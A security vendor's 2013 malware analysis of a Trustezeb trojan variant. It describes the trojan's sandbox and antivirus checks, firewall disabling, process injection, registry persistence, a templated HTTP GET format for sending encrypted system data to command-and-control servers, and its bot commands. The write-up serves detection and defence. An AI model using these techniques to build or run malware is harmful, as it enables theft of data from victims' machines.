A new Trustezeb variant spammed in the wild (Aug 30, 2013)


The Dell SonicWall Threats Research team has observed incidents of a new Trustezeb variant being delivered via e-mail spam and drive-by downloads in the wild. The malware executable is compiled in Microsoft Visual C++ and contains two malicious executable embedded in it that gets run on the target machine. The dropped executable sends sensitive information to a remote server and waits for further commands.

Sample e-mail containing the new Trustezeb variant as an attachment:

Infection Cycle:

Upon execution, the Trojan takes a snapshot of the running processes and checks for the presence of Sandboxie environment as well as Avast antivirus program:

The Trojan creates a mutex UACMutexxxxx to mark its presence on the system.

It attempts to stop the Microsoft Windows firewall by running the following command:

The Trojan then creates a new process svchost.exe, injects one of the two embedded executable that it decrypts on runtime, and runs it. The newly created process checks if the parent process is running from %Temp% folder and if the extension of the parent process is .pre. If not, then it drops a copy of the original malware executable into the %Temp% directory as (RandomName).pre and runs it. The infection process cycle can be seen below:

The Trojan creates a registry entry to ensure that it runs on system reboot.

The dropped malware executable that gets injected into svchost.exe, gathers sensitive information on the target machine and reports it back to the Command & Control server in an encrypted form via HTTP GET request. The format of the GET request used by the malware:

    GET /img_cache.php?text=(RANDOMLY GENERATED KEY BLOCK)&img_url=http://(SENSITIVE SYSTEM DATA).(bmp/jpg/png/pcx)&rpt=simage&pos=(INT)

A sample request looks like the following:

The decrypted version of the data being transmitted in above request contains the following information:


A list of hardcoded Command & Control servers extracted during our analysis can be seen below:

The malicious process then waits for commands from the remote server. We saw support for the following commands in the injected code:

  • URLS
  • LOAD
  • WAIT
  • KILL

Dell SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Trustezeb.E (Trojan)
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.